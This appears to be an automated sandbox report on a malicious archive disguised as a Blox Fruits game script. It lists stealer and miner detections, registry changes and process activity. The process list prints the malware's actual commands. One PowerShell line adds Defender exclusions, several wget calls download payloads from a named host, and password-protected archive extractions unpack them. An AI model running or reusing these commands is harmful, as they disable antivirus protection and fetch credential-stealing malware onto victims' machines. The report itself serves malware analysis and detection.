Analysis Overview
SHA256
37ffba131c763e2630433b2865a8149508af32f387fb5808cfaf539815bb5077
Threat Level: Known bad
The file Blox_Fruits_Script.zip was found to be: Known bad.
Malicious Activity Summary
xmrig
Amadey
RedLine
RedLine payload
XMRig Miner payload
Drops file in Drivers directory
Creates new service(s)
Stops running service(s)
Checks BIOS information in registry
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Suspicious use of SetThreadContext
Modifies system executable filetype association
Launches sc.exe
Checks installed software on the system
Executes dropped EXE
Program crash
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-23 10:17
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A (9 identical hits, no details recorded) | N/A | N/A | N/A |
Analysis: behavioral14
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
119s
Max time network
144s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.178.17.96.in-addr.arpa | udp |
Files
memory/3732-0-0x0000000000400000-0x00000000008F2000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240214-en
Max time kernel
117s
Max time network
129s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\vhXDYuQByxPS.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2bc
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 185.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
Files
memory/932-4-0x0000017472720000-0x0000017472742000-memory.dmp
memory/932-5-0x00007FFFF11C0000-0x00007FFFF1BAC000-memory.dmp
memory/932-6-0x000001745A270000-0x000001745A280000-memory.dmp
memory/932-7-0x000001745A270000-0x000001745A280000-memory.dmp
memory/932-10-0x00000174729D0000-0x0000017472A46000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2nzzbxdd.cwl.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/932-32-0x000001745A270000-0x000001745A280000-memory.dmp
memory/932-41-0x00007FFFF11C0000-0x00007FFFF1BAC000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:23
Platform
win10-20240221-en
Max time kernel
118s
Max time network
141s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\BLAKEX64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 129.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-23 10:15
Reported
2024-02-23 10:22
Platform
win10-20240221-en
Max time kernel
148s
Max time network
142s
Command Line
Signatures
Amadey
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A (13 identical hits, no details recorded) | N/A | N/A | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\SystemFiles\csrss.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\conhost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\system32\conhost.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4440 set thread context of 1620 | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0222 | C:\Users\Admin\AppData\Roaming\services\plugin0222 |
| PID 4352 set thread context of 2928 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 4352 set thread context of 196 | N/A | C:\ProgramData\SystemFiles\csrss.exe | C:\Windows\system32\conhost.exe |
| PID 4632 set thread context of 164 | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0222 | C:\Users\Admin\AppData\Roaming\services\3plugin0222 |
Checks installed software on the system
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0222 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin0222 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin2901 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\ProgramData\SystemFiles\csrss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0222 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin0222 | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\services\plugin0222 |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
The thumbprint D69B561148F01C77C54578C10926DF5B856976AD and the UTF-16 friendly name embedded in the blob ("GlobalSign Root CA - R3") identify these writes as Windows caching the GlobalSign Root CA - R3 certificate in the AuthRoot store through its normal automatic root-update mechanism, which runs in the context of whichever process first validates a chain ending in a root that is not yet cached. It is a side effect of the process making an HTTPS connection, not an attacker-installed root, and is not an IOC on its own.
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (hex value not reproduced here; exact duplicate of a blob shown above) | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (hex value not reproduced here; exact duplicate of a blob shown above) | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0222
C:\Users\Admin\AppData\Roaming\services\plugin0222
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0222
"C:\Users\Admin\AppData\Roaming\services\plugin0222"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 580
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
